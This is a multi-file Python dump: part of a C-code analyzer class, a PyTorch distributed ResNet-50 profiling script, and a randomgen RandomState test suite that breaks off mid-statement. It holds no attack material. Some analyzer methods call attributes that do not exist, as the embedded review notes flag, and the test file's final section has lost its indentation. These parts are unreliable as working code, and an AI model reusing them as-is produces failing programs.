
    def get_function_by_index(self, index):
        """Return the function with the given index, searching all files.

        Returns None implicitly (after printing) when no file has it.
        """
        for f in self.files:
            if self.files[f].has_function_by_index(index):
                return self.files[f].get_function_by_index(index)
        else:
            print("No function found with index " + str(index))
            # exit(1)

    def get_callinstrs(self):
        """Collect call instructions from all files."""
        result = []
        def f(fi):
            result.extend(fi.getcallinstrs())
        self.iter_files(f)
        return result

    def get_externals(self):
        """Return {vfile: [(vname, summarized)]} for external varinfos.

        NOTE(review): self.xnode is never assigned in this class — this
        method raises AttributeError as written; confirm where xnode was
        meant to come from.
        """
        result = {}
        for e in self.xnode.find("global-definitions").find("external-varinfos"):
            vfile = e.get("vfile")
            vname = e.get("vname")
            summarized = e.get("summarized")
            if vfile not in result:
                result[vfile] = []
            result[vfile].append((vname, summarized))
        return result

    def get_compinfo(self, fileindex, ckey):
        """Return the compinfo with key ckey from the file with fileindex."""
        return self.get_file_by_index(fileindex).get_compinfo(ckey)

    def get_global_compinfos(self):
        """Return all globally indexed compinfos."""
        return self.declarations.compinfo_table.values()

    def get_file_compinfos(self):
        """Collect per-file compinfos.

        NOTE(review): self.fileiter does not exist — presumably iter_files;
        also the inner callback shadows itself via def f(f).
        """
        result = []
        def f(f):
            result.extend(f.declarations.getcompinfos())
        self.fileiter(f)
        return result

    def get_file_global_varinfos(self):
        """Collect per-file global varinfos.

        NOTE(review): same self.fileiter issue as get_file_compinfos.
        """
        result = []
        def f(f):
            result.extend(f.declarations.get_global_varinfos())
        self.fileiter(f)
        return result

    # ------------------- Application statistics -----------------------------

    def get_line_counts(self):
        """Return a formatted table of LOC / code-LOC / function counts per file."""
        counts = {}
        def f(cfile):
            decls = cfile.declarations
            counts[cfile.name] = (
                decls.get_max_line(),
                decls.get_code_line_count(),
                decls.get_function_count(),
            )
        self.iter_files(f)
        flen = self.get_max_filename_length()
        lines = []
        lines.append(
            "file".ljust(flen)
            + "LOC".rjust(12)
            + "CLOC".rjust(12)
            + "functions".rjust(12)
        )
        lines.append("-" * (flen + 36))
        for (c, (ml, mc, fc)) in sorted(counts.items()):
            lines.append(
                c.ljust(flen)
                + str(ml).rjust(12)
                + str(mc).rjust(12)
                + str(fc).rjust(12)
            )
        lines.append("-" * (flen + 36))
        mltotal = sum(x[0] for x in counts.values())
        mctotal = sum(x[1] for x in counts.values())
        fctotal = sum(x[2] for x in counts.values())
        lines.append(
            "total".ljust(flen)
            + str(mltotal).rjust(12)
            + str(mctotal).rjust(12)
            + str(fctotal).rjust(12)
        )
        return "\n".join(lines)

    def get_project_counts(self, filefilter=lambda f: True):
        """Return (total LOC, total code LOC, total functions) over files passing filefilter."""
        linecounts = []
        clinecounts = []
        cfuncounts = []
        def f(cfile):
            if filefilter(cfile.name):
                decls = cfile.declarations
                linecounts.append(decls.get_max_line())
                clinecounts.append(decls.get_code_line_count())
                cfuncounts.append(decls.get_function_count())
        self.iter_files(f)
        return (sum(linecounts), sum(clinecounts), sum(cfuncounts))

    def update_spos(self):
        """Create supporting proof obligations for all call sites."""
        def f(fn):
            fn.update_spos()
            fn.save_spos()
            fn.save_pod()
        def h(cfile):
            cfile.iter_functions(f)
            # persist file-level dictionaries touched by the update
            cfile.save_predicate_dictionary()
            cfile.save_interface_dictionary()
            cfile.save_declarations()
        self.iter_files(h)

    def collect_post_assumes(self):
        """For all call sites collect postconditions from callee's contracts and add as assume."""
        self.iter_files(lambda f: f.collect_post_assumes())

    def distribute_post_guarantees(self):
        """add callee postcondition guarantees to call sites as assumptions"""
        if self.contractpath is None:
            return  # no contracts provided
        def f(fn):
            fn.distribute_post_guarantees()
            fn.save_spos()
            fn.save_pod()
        def h(cfile):
            cfile.iter_functions(f)
            cfile.save_predicate_dictionary()
            cfile.save_interface_dictionary()
            cfile.save_declarations()
        self.iter_files(h)

    def reinitialize_tables(self):
        """Reload all per-file tables from disk."""
        def f(fi):
            fi.reinitialize_tables()
        self.iter_files(f)

    def reload_ppos(self):
        """Reload primary proof obligations after analyzer checks."""
        def f(fn):
            fn.reload_ppos()
        self.iter_functions(f)

    def reload_spos(self):
        """Reload supporting proof obligations after analyzer invariant generation and checks."""
        def f(fn):
            fn.reload_spos()
        self.iter_functions(f)

    def get_contract_condition_violations(self):
        """Return [(function name, violations)] for functions violating contract conditions."""
        result = []
        def f(fn):
            if fn.violates_contract_conditions():
                result.append((fn.name, fn.get_contract_condition_violations()))
        self.iter_functions(f)
        return result

    def get_ppos(self):
        """Collect all primary proof obligations."""
        result = []
        def f(fn):
            result.extend(fn.get_ppos())
        self.iter_functions(f)
        return result

    def get_spos(self):
        """Collect all supporting proof obligations."""
        result = []
        def f(fn):
            result.extend(fn.get_spos())
        self.iter_functions(f)
        return result

    def get_open_ppos(self):
        """Collect all still-open primary proof obligations."""
        result = []
        def f(fn):
            result.extend(fn.get_open_ppos())
        self.iter_functions(f)
        return result

    def get_violations(self):
        """Collect all proven violations."""
        result = []
        def f(fn):
            result.extend(fn.get_violations())
        self.iter_functions(f)
        return result

    def get_delegated(self):
        """Collect all delegated proof obligations."""
        result = []
        def f(fn):
            result.extend(fn.get_delegated())
        self.iter_functions(f)
        return result

    def _initialize(self, fname: Optional[str]) -> None:
        """Populate filenames from target_files.xml, or load the single file."""
        if fname is None:
            # read target_files.xml file to retrieve application files
            tgtxnode = UF.get_targetfiles_xnode(self.path)
            if tgtxnode is None:
                raise UF.CHCXmlParseError(self.path, 0, (0, 0))
            if self.includefiles is None:
                # all files except those explicitly excluded
                for c in tgtxnode.findall("c-file"):
                    found_name = c.get("name")
                    if found_name is None:
                        raise UF.CHCXmlParseError(self.path, 0, (0, 0))
                    if found_name in self.excludefiles:
                        continue
                    id = c.get("id")
                    if id is None:
                        print("No id found for " + (found_name or "(name not found)"))
                    else:
                        self.filenames[int(id)] = found_name
            else:
                # only the explicitly included files
                for c in tgtxnode.findall("c-file"):
                    found_name = c.get("name")
                    if found_name is None:
                        raise UF.CHCXmlParseError(self.path, 0, (0, 0))
                    if found_name in self.includefiles:
                        id = c.get("id")
                        if id is None:
                            print("No id found for " + found_name)
                        else:
                            self.filenames[int(id)] = found_name
        else:
            self._initialize_file(0, fname)

    def _initialize_files(self) -> None:
        """Ensure a CFile exists for every registered filename."""
        for i, f in self.filenames.items():
            self._initialize_file(i, f)

    def _initialize_file(self, index: int, fname: str) -> None:
        """Load fname's analysis xml and register it (no-op if already loaded)."""
        if fname in self.files:
            return
        cfile = UF.get_cfile_xnode(self.path, fname)
        if cfile is not None:
            self.filenames[index] = fname
            self.files[fname] = CFile(self, index, cfile)
            self.indexmanager.add_file(self.files[fname])
        else:
            # report the available filenames to aid diagnosis
            tgtxnode = UF.get_targetfiles_xnode(self.path)
            if tgtxnode is None:
                raise UF.CHCXmlParseError(self.path, 0, (0, 0))
            filenames = [c.get("name") or "name not found" for c in tgtxnode.findall("c-file")]
            raise UF.CFileNotFoundException(filenames)

    def _initialize_callgraphs(self) -> None:
        """Build callgraph and revcallgraph once, by visiting every call site."""
        if len(self.callgraph) > 0:
            return

        def collectcallers(fn: "CFunction") -> None:
            fid = fn.cfile.index
            vid = fn.svar.get_vid()

            def g(cs):
                # skip indirect calls with unresolved callee
                if cs.callee is None:
                    return
                fundef = self.indexmanager.resolve_vid(fid, cs.callee.get_vid())
                if fundef is not None:
                    if not (fid, vid) in self.callgraph:
                        self.callgraph[(fid, vid)] = []
                    self.callgraph[(fid, vid)].append((cs, fundef))
            fn.iter_callsites(g)
        self.iter_functions(collectcallers)
        # invert the callgraph: target -> list of (caller, callsite)
        for s in self.callgraph:
            for (cs, t) in self.callgraph[s]:
                if t not in self.revcallgraph:
                    self.revcallgraph[t] = []
                self.revcallgraph[t].append((s, cs))
|
resnet50_ddp_profiler.py | import os
import torch
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim
import torch.profiler
import torch.utils.data
import torchvision
import torchvision.models as models
import torchvision.transforms as T
from torch.nn.parallel import DistributedDataParallel as DDP
def example(rank, use_gpu=True):
    """Run a short, profiled DDP training pass of ResNet-50 on CIFAR-10.

    rank: this process's rank (also used as the CUDA device index).
    use_gpu: whether to place model/criterion/data on cuda:rank.
        NOTE(review): init_process() calls fn(rank, size), so when launched
        from __main__ this parameter actually receives the world size (4),
        which is merely truthy — confirm the intended call signature.
    """
    if use_gpu:
        torch.cuda.set_device(rank)
        model = models.resnet50(pretrained=True).to(rank)
        model.cuda()  # NOTE(review): redundant after .to(rank)
        cudnn.benchmark = True
        model = DDP(model, device_ids=[rank])
    else:
        model = models.resnet50(pretrained=True)
        model = DDP(model)
    # Use gradient compression to reduce communication
    # model.register_comm_hook(None, default.fp16_compress_hook)
    # or
    # state = powerSGD_hook.PowerSGDState(process_group=None,matrix_approximation_rank=1,start_powerSGD_iter=2)
    # model.register_comm_hook(state, powerSGD_hook.powerSGD_hook)
    transform = T.Compose([T.Resize(256), T.CenterCrop(224), T.ToTensor()])
    trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
                                            download=True, transform=transform)
    # shuffle=False is required when a DistributedSampler is supplied;
    # the sampler does the per-rank shuffling/partitioning
    train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
    trainloader = torch.utils.data.DataLoader(trainset, batch_size=32, sampler=train_sampler,
                                              shuffle=False, num_workers=4)
    if use_gpu:
        criterion = nn.CrossEntropyLoss().to(rank)
    else:
        criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)
    model.train()
    # profile 9 steps (wait=2, warmup=2, active=5), trace goes to ./result
    with torch.profiler.profile(
            activities=[
                torch.profiler.ProfilerActivity.CPU,
                torch.profiler.ProfilerActivity.CUDA],
            schedule=torch.profiler.schedule(
                wait=2,
                warmup=2,
                active=5),
            with_stack=False,
            on_trace_ready=torch.profiler.tensorboard_trace_handler('./result'),
            record_shapes=True
    ) as p:
        for step, data in enumerate(trainloader, 0):
            print("step:{}".format(step))
            if use_gpu:
                inputs, labels = data[0].to(rank), data[1].to(rank)
            else:
                inputs, labels = data[0], data[1]
            outputs = model(inputs)
            loss = criterion(outputs, labels)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            p.step()  # advance the profiler schedule once per iteration
            if step + 1 >= 10:
                break  # only the first 10 steps are needed for the trace
def init_process(rank, size, fn, backend='nccl'):
    """ Initialize the distributed environment.

    Joins the process group at 127.0.0.1:29500 with the given backend
    (nccl requires GPUs), then invokes fn(rank, size).
    NOTE(review): with fn=example, `size` lands in example's `use_gpu`
    parameter — truthy, so it behaves like use_gpu=True; confirm intent.
    """
    os.environ['MASTER_ADDR'] = '127.0.0.1'
    os.environ['MASTER_PORT'] = '29500'
    dist.init_process_group(backend, rank=rank, world_size=size)
    fn(rank, size)
if __name__ == "__main__":
    # spawn one worker process per rank; "spawn" is required for CUDA safety
    size = 4  # world size (number of ranks)
    processes = []
    mp.set_start_method("spawn")
    for rank in range(size):
        p = mp.Process(target=init_process, args=(rank, size, example))
        p.start()
        processes.append(p)
    # wait for all ranks to finish
    for p in processes:
        p.join()
|
test_randomstate.py | import hashlib
import pickle
import sys
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_array_almost_equal,
assert_array_equal,
assert_equal,
assert_no_warnings,
assert_raises,
assert_warns,
suppress_warnings,
)
import pytest
from randomgen.mt19937 import MT19937
import randomgen.mtrand
from randomgen.xoshiro256 import Xoshiro256
random = randomgen.mtrand
# Integer-valued distribution methods and the arguments used to exercise them
# in the reproducibility (hash) tests below.
INT_FUNCS = {
    "binomial": (100.0, 0.6),
    "geometric": (0.5,),
    "hypergeometric": (20, 20, 10),
    "logseries": (0.5,),
    "multinomial": (20, np.ones(6) / 6.0),
    "negative_binomial": (100, 0.5),
    "poisson": (10.0,),
    "zipf": (2,),
}

# Expected stream hashes differ with the platform's default int width,
# because the generated integer dtype differs (32- vs 64-bit).
if np.iinfo(int).max < 2 ** 32:
    # Windows and some 32-bit platforms, e.g., ARM
    INT_FUNC_HASHES = {
        "binomial": "670e1c04223ffdbab27e08fbbad7bdba",
        "logseries": "6bd0183d2f8030c61b0d6e11aaa60caf",
        "geometric": "6e9df886f3e1e15a643168568d5280c0",
        "hypergeometric": "7964aa611b046aecd33063b90f4dec06",
        "multinomial": "68a0b049c16411ed0aa4aff3572431e4",
        "negative_binomial": "dc265219eec62b4338d39f849cd36d09",
        "poisson": "7b4dce8e43552fc82701c2fa8e94dc6e",
        "zipf": "fcd2a2095f34578723ac45e43aca48c5",
    }
else:
    INT_FUNC_HASHES = {
        "binomial": "b5f8dcd74f172836536deb3547257b14",
        "geometric": "8814571f45c87c59699d62ccd3d6c350",
        "hypergeometric": "bc64ae5976eac452115a16dad2dcf642",
        "logseries": "84be924b37485a27c4a98797bc88a7a4",
        "multinomial": "ec3c7f9cf9664044bb0c6fb106934200",
        "negative_binomial": "210533b2234943591364d0117a552969",
        "poisson": "0536a8850c79da0c78defd742dccc3e0",
        "zipf": "f2841f504dd2525cd67cdcad7561e532",
    }
@pytest.fixture(scope="module", params=INT_FUNCS)
def int_func(request):
    """Yield (method name, call args, expected stream hash) per int distribution."""
    return (request.param, INT_FUNCS[request.param], INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
    """Assert two MT19937 ``get_state(legacy=False)`` dicts are identical.

    Compares the bit-generator name, the 624-word key and position of the
    Mersenne Twister state, and the cached-Gaussian bookkeeping fields.
    Raises AssertionError on the first mismatch.
    """
    assert_equal(a["bit_generator"], b["bit_generator"])
    for part in ("key", "pos"):
        assert_array_equal(a["state"][part], b["state"][part])
    for part in ("has_gauss", "gauss"):
        assert_equal(a[part], b[part])
class TestSeed(object):
    """Seeding behavior of the legacy RandomState interface.

    The literal expected values pin the legacy MT19937 seeding algorithm;
    any change to the stream is a compatibility break.
    """

    def test_scalar(self):
        # scalar seeds at both ends of the valid uint32 range
        s = random.RandomState(0)
        assert_equal(s.randint(1000), 684)
        s = random.RandomState(4294967295)
        assert_equal(s.randint(1000), 419)

    def test_array(self):
        # equivalent array-like seeds must produce identical streams
        s = random.RandomState(range(10))
        assert_equal(s.randint(1000), 468)
        s = random.RandomState(np.arange(10))
        assert_equal(s.randint(1000), 468)
        s = random.RandomState([0])
        assert_equal(s.randint(1000), 973)
        s = random.RandomState([4294967295])
        assert_equal(s.randint(1000), 265)

    def test_invalid_scalar(self):
        # seed must be an unsigned 32 bit integer
        assert_raises(TypeError, random.RandomState, -0.5)
        assert_raises(ValueError, random.RandomState, -1)

    def test_invalid_array(self):
        # seed must be an unsigned 32 bit integer
        assert_raises(TypeError, random.RandomState, [-0.5])
        assert_raises(ValueError, random.RandomState, [-1])
        assert_raises(ValueError, random.RandomState, [4294967296])
        assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
        assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])

    def test_invalid_array_shape(self):
        # gh-9832: seeds must be 1-d and non-empty
        assert_raises(ValueError, random.RandomState, np.array([], dtype=np.int64))
        assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
        assert_raises(ValueError, random.RandomState, [[1, 2, 3], [4, 5, 6]])

    def test_seed_equivalency(self):
        # seeding via int and via a pre-built legacy MT19937 must agree
        rs = random.RandomState(0)
        rs2 = random.RandomState(MT19937(0, mode="legacy"))
        assert_mt19937_state_equal(
            rs.get_state(legacy=False), rs2.get_state(legacy=False)
        )

    def test_invalid_initialization(self):
        # passing the class itself (not an instance) is rejected
        assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial(object):
    """Edge cases of the binomial distribution."""

    def test_n_zero(self):
        # Tests the corner case of n == 0 for the binomial distribution.
        # binomial(0, p) should be zero for any p in [0, 1].
        # This test addresses issue #3480.
        zeros = np.zeros(2, dtype="int")
        for p in [0, 0.5, 1]:
            assert_(random.binomial(0, p) == 0)
            assert_array_equal(random.binomial(zeros, p), zeros)

    def test_p_is_nan(self):
        # Issue #4571: nan probability must raise, not propagate
        assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
    """Argument validation and shape handling of multinomial (and randint)."""

    def test_basic(self):
        random.multinomial(100, [0.2, 0.8])

    def test_zero_probability(self):
        # zero-probability categories are allowed
        random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])

    def test_int_negative_interval(self):
        # randint with a fully negative [low, high) interval
        assert_(-5 <= random.randint(-5, -1) < -1)
        x = random.randint(-5, -1, 5)
        assert_(np.all(-5 <= x))
        assert_(np.all(x < -1))

    def test_size(self):
        # gh-3173: size may be a numpy integer, list, tuple, or array
        p = [0.5, 0.5]
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2))
        assert_raises(TypeError, random.multinomial, 1, p, float(1))

    def test_invalid_prob(self):
        # probabilities must lie in [0, 1]
        assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
        assert_raises(ValueError, random.multinomial, 100, [-0.1, 0.9])

    def test_invalid_n(self):
        assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])

    def test_p_noncontiguous(self):
        # a strided pvals view must give the same draw as its contiguous copy
        p = np.arange(15.0)
        p /= np.sum(p[1::3])
        pvals = p[1::3]
        random.seed(1432985819)
        non_contig = random.multinomial(100, pvals=pvals)
        random.seed(1432985819)
        contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
        assert_array_equal(non_contig, contig)

    def test_large_p(self):
        # sum(pvals) > 1 must raise with a message naming pvals
        with pytest.raises(ValueError, match=r"sum\(pvals"):
            random.multinomial(100, np.array([0.7, 0.6, 0.5, 0]))
class TestSetState(object):
    """Round-trip tests for RandomState.get_state()/set_state()."""

    def setup(self):
        # Capture one seeded state; individual tests restore it to verify
        # the stream is reproducible.
        # NOTE(review): pytest prefers ``setup_method`` these days; ``setup``
        # still runs via the nose-compat shim — confirm before renaming.
        self.seed = 1234567890
        self.random_state = random.RandomState(self.seed)
        self.state = self.random_state.get_state()

    def test_basic(self):
        # Restoring the saved state must reproduce the same integer stream.
        old = self.random_state.tomaxint(16)
        self.random_state.set_state(self.state)
        new = self.random_state.tomaxint(16)
        assert_(np.all(old == new))

    def test_gaussian_reset(self):
        # Make sure the cached every-other-Gaussian is reset.
        old = self.random_state.standard_normal(size=3)
        self.random_state.set_state(self.state)
        new = self.random_state.standard_normal(size=3)
        assert_(np.all(old == new))

    def test_gaussian_reset_in_media_res(self):
        # When the state is saved with a cached Gaussian, make sure the
        # cached Gaussian is restored.
        self.random_state.standard_normal()
        state = self.random_state.get_state()
        old = self.random_state.standard_normal(size=3)
        self.random_state.set_state(state)
        new = self.random_state.standard_normal(size=3)
        assert_(np.all(old == new))

    def test_backwards_compatibility(self):
        # Make sure we can accept old state tuples that do not have the
        # cached Gaussian value.
        old_state = self.state[:-2]
        x1 = self.random_state.standard_normal(size=16)
        self.random_state.set_state(old_state)
        x2 = self.random_state.standard_normal(size=16)
        self.random_state.set_state(self.state)
        x3 = self.random_state.standard_normal(size=16)
        assert_(np.all(x1 == x2))
        assert_(np.all(x1 == x3))

    def test_negative_binomial(self):
        # Ensure that the negative binomial results take floating point
        # arguments without truncation.
        self.random_state.negative_binomial(0.5, 0.5)

    def test_get_state_warning(self):
        # get_state() on a non-MT19937 bit generator cannot build the legacy
        # tuple: it warns once and returns the dict form instead.
        rs = random.RandomState(Xoshiro256(mode="legacy"))
        with suppress_warnings() as sup:
            w = sup.record(RuntimeWarning)
            state = rs.get_state()
            assert_(len(w) == 1)
            assert isinstance(state, dict)
            assert state["bit_generator"] == "Xoshiro256"

    def test_invalid_legacy_state_setting(self):
        # An unknown generator name, the wrong container type, and a dict
        # missing "bit_generator" are all rejected by set_state().
        state = self.random_state.get_state()
        new_state = ("Unknown",) + state[1:]
        assert_raises(ValueError, self.random_state.set_state, new_state)
        assert_raises(
            TypeError, self.random_state.set_state, np.array(new_state, dtype=object)
        )
        state = self.random_state.get_state(legacy=False)
        del state["bit_generator"]
        assert_raises(ValueError, self.random_state.set_state, state)

    def test_pickle(self):
        # Pickling must preserve the full state, including the cached
        # second Gaussian (has_gauss).
        self.random_state.seed(0)
        self.random_state.random_sample(100)
        self.random_state.standard_normal()
        pickled = self.random_state.get_state(legacy=False)
        assert_equal(pickled["has_gauss"], 1)
        rs_unpick = pickle.loads(pickle.dumps(self.random_state))
        unpickled = rs_unpick.get_state(legacy=False)
        assert_mt19937_state_equal(pickled, unpickled)

    def test_state_setting(self):
        # __getstate__/__setstate__ (the pickle protocol hooks) round-trip.
        attr_state = self.random_state.__getstate__()
        self.random_state.standard_normal()
        self.random_state.__setstate__(attr_state)
        state = self.random_state.get_state(legacy=False)
        assert_mt19937_state_equal(attr_state, state)

    def test_repr(self):
        # repr advertises the wrapped bit generator.
        assert repr(self.random_state).startswith("RandomState(MT19937)")
class TestRandint(object):
    """Bounds, dtype handling, and reproducibility checks for randint."""

    rfunc = random.randint

    # valid integer/boolean types
    itype = [
        np.bool_,
        np.int8,
        np.uint8,
        np.int16,
        np.uint16,
        np.int32,
        np.uint32,
        np.int64,
        np.uint64,
    ]

    def test_unsupported_type(self):
        # Floating-point dtypes are not valid for randint.
        assert_raises(TypeError, self.rfunc, 1, dtype=float)

    def test_bounds_checking(self):
        # Bounds outside the dtype's range, or inverted [low, high),
        # must raise for every supported dtype.
        for dt in self.itype:
            lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
            ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
            assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
            assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
            assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
            assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)

    def test_rng_zero_and_extremes(self):
        # Degenerate single-value ranges at the top, bottom, and midpoint
        # of each dtype's range always return that single value.
        for dt in self.itype:
            lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
            ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
            tgt = ubnd - 1
            assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
            tgt = lbnd
            assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
            tgt = (lbnd + ubnd) // 2
            assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)

    def test_full_range(self):
        # Test for ticket #1690: spanning the full representable range of
        # each dtype must not raise.
        for dt in self.itype:
            lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
            ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
            try:
                self.rfunc(lbnd, ubnd, dtype=dt)
            except Exception as e:
                raise AssertionError(
                    "No error should have been raised, "
                    "but one was with the following "
                    "message:\n\n%s" % str(e)
                )

    def test_in_bounds_fuzz(self):
        # Don't use fixed seed
        random.seed()
        for dt in self.itype[1:]:
            for ubnd in [4, 8, 16]:
                vals = self.rfunc(2, ubnd, size=2 ** 16, dtype=dt)
                assert_(vals.max() < ubnd)
                assert_(vals.min() >= 2)
        vals = self.rfunc(0, 2, size=2 ** 16, dtype=np.bool_)
        assert_(vals.max() < 2)
        assert_(vals.min() >= 0)

    def test_repeatability(self):
        # We use a md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but bool, where the range
        # is [0, 2). Hashes are for little endian numbers.
        tgt = {
            "bool": "7dd3170d7aa461d201a65f8bcf3944b0",
            "int16": "1b7741b80964bb190c50d541dca1cac1",
            "int32": "4dc9fcc2b395577ebb51793e58ed1a05",
            "int64": "17db902806f448331b5a758d7d2ee672",
            "int8": "27dd30c4e08a797063dffac2490b0be6",
            "uint16": "1b7741b80964bb190c50d541dca1cac1",
            "uint32": "4dc9fcc2b395577ebb51793e58ed1a05",
            "uint64": "17db902806f448331b5a758d7d2ee672",
            "uint8": "27dd30c4e08a797063dffac2490b0be6",
        }
        for dt in self.itype[1:]:
            random.seed(1234)
            # view as little endian for hash
            if sys.byteorder == "little":
                val = self.rfunc(0, 6, size=1000, dtype=dt)
            else:
                val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
            res = hashlib.md5(val.view(np.int8)).hexdigest()
            assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
        random.seed(1234)
        val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
        res = hashlib.md5(val).hexdigest()
        assert_(tgt[np.dtype(bool).name] == res)

    def test_int64_uint64_corner_case(self):
        # When stored in Numpy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
        # Checking whether `lbnd` >= `ubnd` used to be
        # done solely via direct comparison, which is incorrect
        # because when Numpy tries to compare both numbers,
        # it casts both to np.float64 because there is
        # no integer superset of np.int64 and np.uint64. However,
        # `ubnd` is too large to be represented in np.float64,
        # causing it be round down to np.iinfo(np.int64).max,
        # leading to a ValueError because `lbnd` now equals
        # the new `ubnd`.
        dt = np.int64
        tgt = np.iinfo(np.int64).max
        lbnd = np.int64(np.iinfo(np.int64).max)
        ubnd = np.uint64(np.iinfo(np.int64).max + 1)
        # None of these function calls should
        # generate a ValueError now.
        actual = random.randint(lbnd, ubnd, dtype=dt)
        assert_equal(actual, tgt)

    def test_respect_dtype_singleton(self):
        # See gh-7203: the returned sample honours the requested dtype,
        # and the Python types bool/int yield plain Python scalars.
        for dt in self.itype:
            lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
            ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
            sample = self.rfunc(lbnd, ubnd, dtype=dt)
            assert_equal(sample.dtype, np.dtype(dt))
        for dt in (bool, int):
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            # gh-7284: Ensure that we get Python data types
            sample = self.rfunc(lbnd, ubnd, dtype=dt)
            assert_(not hasattr(sample, "dtype"))
            assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
    def setup(self):
        # Fixed seed so every distribution test below sees a reproducible
        # stream.  NOTE(review): pytest prefers ``setup_method``; ``setup``
        # still runs via the nose-compat shim — confirm before renaming.
        self.seed = 1234567890
    def test_rand(self):
        # Seeded regression test: rand(3, 2) must reproduce this exact
        # matrix of uniforms on [0, 1).
        random.seed(self.seed)
        actual = random.rand(3, 2)
        desired = np.array(
            [
                [0.61879477158567997, 0.59162362775974664],
                [0.88868358904449662, 0.89165480011560816],
                [0.4575674820298663, 0.7781880808593471],
            ]
        )
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_rand_singleton(self):
        # rand() with no size argument yields the first value of the
        # seeded stream as a scalar.
        random.seed(self.seed)
        actual = random.rand()
        desired = 0.61879477158567997
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_randn(self):
        # Seeded regression test for standard normals; the scalar form is
        # re-checked against the first element after re-seeding.
        random.seed(self.seed)
        actual = random.randn(3, 2)
        desired = np.array(
            [
                [1.34016345771863121, 1.73759122771936081],
                [1.498988344300628, -0.2286433324536169],
                [2.031033998682787, 2.17032494605655257],
            ]
        )
        assert_array_almost_equal(actual, desired, decimal=15)
        random.seed(self.seed)
        actual = random.randn()
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)
    def test_randint(self):
        # Seeded regression test over a signed interval.
        random.seed(self.seed)
        actual = random.randint(-99, 99, size=(3, 2))
        desired = np.array([[31, 3], [-52, 41], [-48, -66]])
        assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array(
[
[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889],
],
dtype=np.int64,
)
else:
desired = np.array(
[
[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332],
],
dtype=np.int64,
)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo("l").max, np.iinfo("l").max)
assert_(len(w) == 1)
desired = np.iinfo("l").max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype("l").type
actual = random.random_integers(
typer(np.iinfo("l").max), typer(np.iinfo("l").max)
)
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning, random.random_integers, np.iinfo("l").max)
# DeprecationWarning raised with high != None
assert_raises(
DeprecationWarning,
random.random_integers,
